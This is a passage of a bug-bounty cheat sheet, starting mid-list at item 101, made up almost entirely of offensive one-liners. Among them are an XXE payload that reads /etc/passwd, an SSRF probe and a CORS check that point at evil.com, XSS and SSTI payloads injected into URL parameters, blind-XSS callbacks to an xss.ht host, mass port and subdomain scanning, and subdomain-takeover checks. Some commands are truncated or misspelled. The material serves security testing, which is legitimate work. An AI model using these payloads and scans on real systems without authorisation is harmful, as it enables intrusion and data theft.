curl -I -H 'Origin: https://evil.com' 'https://target.com/api.php'
101. Blind SSRF (Server-Side Request Forgery) testing with time-based payloads
time curl -s 'https://target.com/api.php?url=http://evil.com&secret_token=123' -H 'X-Forwarded-For: 127.0.0.1'
102. JWT (JSON Web Token) testing with jwt_tool
jwt_tool.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c -k secret
103. GraphQL testing with gqlmap
gqlmap.py -u 'https://target.com/graphql' -t GET --level 2
104. XXE (XML External Entity) injection testing with Burp Suite
curl -d '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' 'https://target.com/xxe.php' | base64 -w 0 | pbcopy
Then, paste the base64-encoded request into the “Paste from clipboard” feature in Burp Suite.
105. API testing with HTTPie
http https://target.com/api/v1/users/1 Authorization:'Bearer JWT_TOKEN'
106. HTML injection testing
curl -d '<script>alert("XSS")</script>' 'https://target.com/comment.php'

=========================================================================================================================================



107.Scanning XSS from host / from @cihanmehmet in awesome-oneliner-bugbounty
▶ gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt

108.Automating XSS using Dalfox, GF and Waybackurls
▶ cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht)
109.Find XSS and Blind XSS, and send every request to burpsuite for more manual testing
▶ dalfox file hosts --mining-dom  --deep-domxss --ignore-return -b 'YOURS.xss.ht' --follow-redirects --proxy http://127.0.0.1:8080
110.dalfox scan to bugbounty targets / from KingOfBugBountyTips
▶ wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
11.Recon subdomains and gau to search vuls DalFox / from KingOfBugBountyTips
▶ assetfinder testphp.vulnweb.com | gau |  dalfox pipe




Content Discovery/Recon :
Using dns.bufferover.run
curl -s https://dns.bufferover.run/dns?q=.example.com |jq -r .FDNS_A[]|cut -d',' -f2|sort -u
Using Crt.sh
curl -s https://dns.bufferover.run/dns?q=.hackerone.com |jq -r .FDNS_A[]|cut -d',' -f2|sort -u
Using Certspotter
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq
Using Certspotter (With port scanning)
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p 80,443,21,22,8080,8081,8443 --open -n -oG -
Sublist3r One Liner
. <(cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt)
Grab Titles of webpages
for i in $(cat Webservers.txt ); do echo "$i | $(curl --connect-timeout 0.5 $i -so - | grep -iPo '(?<=<title>)(.*)(?=</title>)')"; done
Enumerate hosts from SSL Certificate
echo | openssl s_client -connect https://targetdomain.com:443 | openssl x509 -noout -text | grep DNS
Google DNS via HTTPS
echo "targetdomain.com" | xargs -I domain proxychains curl -s "https://dns.google.com/resolve?name=domain&type=A" | jq .
CommonCrawl to find endpoints on a site
echo "targetdomain.com" | xargs -I domain curl -s "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.domain&output=json" | jq -r .url | sort -u
Using WebArchive
curl -s "http://web.archive.org/cdx/search/cdx?url=*.hackerone.com/*&output=text&fl=original&collapse=urlkey" |sort| sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | uniq
Using ThreatCrowd
curl https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=hackerone.com |jq .subdomains |grep -o '\w.*hackerone.com'
Using Hackertarget
curl https://api.hackertarget.com/hostsearch/?q=hackerone.com | grep -o '\w.*hackerone.com'
Bruteforce Subdomains
while read sub; do if host "$sub.example.com" &> /dev/null; then echo "$sub.example.com"; fi; done < wordslist.txt
Assetfinder
assetfinder http://hackerone.com > recon.txt; for d in $(<recon.txt); do $(cutycapt --url=$d --out=$d.jpg --max-wait=100000); done
Find Domains that have "xyz" in whois
@thevillagehacker
curl -H "User-Agent: Mozilla" "viewdns.info/reversewhois/?..." | grep -Po "<tr><td>[^<]+</td>" | cut -d '>' -f3 | cut -d '<' -f1
Get Content-Type
@thevillagehacker
echo abc.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
Fuzz with FFUF
@thevillagehacker
assetfinder http://att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'
Open redirect chech
@thevillagehacker
echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
Extract URL from .apk file
@thevillagehacker
apktool -d com.uber -o uberAPK; grep -Phro "(https?://)[\w\,-/]+[\"\']" uberAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"
Information Disclosure
@thevillagehacker
cat host.txt | httpx -path //server-status?full=true -status-code -content-length
cat host.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length
Find xmlrpc.php in single shot
@thevillagehacker
cat domain.txt | assetfinder --subs-only | httprobe | while read url; do xml=$(curl -s -L $url/xmlrpc.php | grep 'XML-RPC');echo -e "$url -> $xml";done | grep 'XML-RPC' | sort -u
Reflected XSS
@thevillagehacker
subfinder -d abc.com | httprobe -c 100 > target.txt
cat target.txt | waybackurls | gf xss | kxss
gospider -a -s abc.com -t 3 -c 100 |  tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
SSTI to RCE
@thevillagehacker
 waybackurls http://target.com | qsreplace "abc{{9*9}}" > fuzz.txt
 ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
search: abc81 in burpsuite search and check
Check for open redirect,ssrf with waybackurls
@thevillagehacker
waybackurls target[.]com | grep ‘http%\|https%'
 Note : You can replace the URLs you find with yours and hope for an open redirect,ssrf or something else. You can grep out analytic stuff with grep -v. If your target has something with OAuth with a redirect_uri target/ that's an easy Account takeover
Searching for endpoints, by apks
@thevillagehacker
apktool -d com.uber -o uberAPK; grep -Phro "(https?://)[\w\,-/]+[\"\']" uberAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"
Fuzz all js files from the target
@thevillagehacker
xargs -P 500 -a domain -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 


Get Subdomains With synapsint.com
@pikpikcu

curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2Fdomain.com" | grep -oE "[a-zA-Z0-9._-]+\.domain.com" | sort -u 
Get Subdomains from crt.sh
@vict0ni

curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
Sort & Tested Domains from Recon.dev
@stokfedrik

curl "https://recon.dev/api/search?key=apikey&domain=example.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent
Subdomain Bruteforcer with FFUF
@GochaOqradze

ffuf -u https://FUZZ.rootdomain -w jhaddixall.txt -v | grep "| URL |" | awk '{print $4}'
Find All Allocated IP ranges for ASN given an IP address
wains.be

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net $1 | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
Extract IPs from a File
@emenalf

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
Ports Scan without CloudFlare
@dwisiswant0

subfinder -silent -d uber.com | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe
Create Custom Wordlists
@tomnomnom

gau domain.com| unfurl -u keys | tee -a wordlist.txt ; gau domain.com | unfurl -u paths|tee -a ends.txt; sed 's#/#\n#g' ends.txt  | sort -u | tee -a wordlist.txt | sort -u ;rm ends.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' wordlist.txt
cat domains.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a words.txt  
Extracts Juicy Informations
@Prial Islam Khan

for sub in $(cat domains.txt);do /usr/bin/gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq |egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a file.txt  ;done
Find Subdomains TakeOver
@hahwul

subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; 
Get multiple target’s Custom URLs from ParamSpider
@hahwul

cat domains | xargs -I % python3 ~/tool/ParamSpider/paramspider.py -l high -o ./spidering/paramspider/% -d % ;
URLs Probing with cURL + Parallel
@akita_zen


cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
Dump In-scope Assets from chaos-bugbounty-list
@dwisiswant0

curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'
Dump In-scope Assets from bounty-targets-data
@dwisiswant0

HackerOne Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
BugCrowd Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
Intigriti Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
YesWeHack Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
HackenProof Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'
Federacy Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
Get all the urls out of a sitemap.xml
@healthyoutlet


curl -s domain.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'
Pure bash Linkfinder
@ntrzz

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt
Extract Endpoints from swagger.json
@zer0pwn

curl -s https://domain.tld/v2/swagger.json | jq '.paths | keys[]'
CORS Misconfiguration
@manas_hunter


site="https://example.com"; gau "$site" | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
Find Hidden Servers and/or Admin Panels
@rez0__

ffuf -c -u https://target .com -H "Host: FUZZ" -w vhost_wordlist.txt 
Recon using api.recon.dev
@z0idsec

curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=site.com | jg .[].domain
Find live host/domain/assets
@YashGoti

subfinder -d http://tesla.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
XSS without gf
@HacktifyS

waybackurls testphp.vulnweb.com| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
Extract endpoints from APK files
@laughface809


apkurlgrep -a path/to/file.apk
Get Subdomains from IPs
@laughface809

python3 hosthunter.py <target-ips.txt> > vhosts.txt
webscreenshot
@laughface809

python webscreenshot.py -i list.txt -w 40
Removes duplicate URLs and parameter combinations
@laughface809

cat urls.txt |qsreplace -a
Gather domains from content-security-policy:
@geeknik

curl -v -silent https://$domain --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" |  sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u


Last updated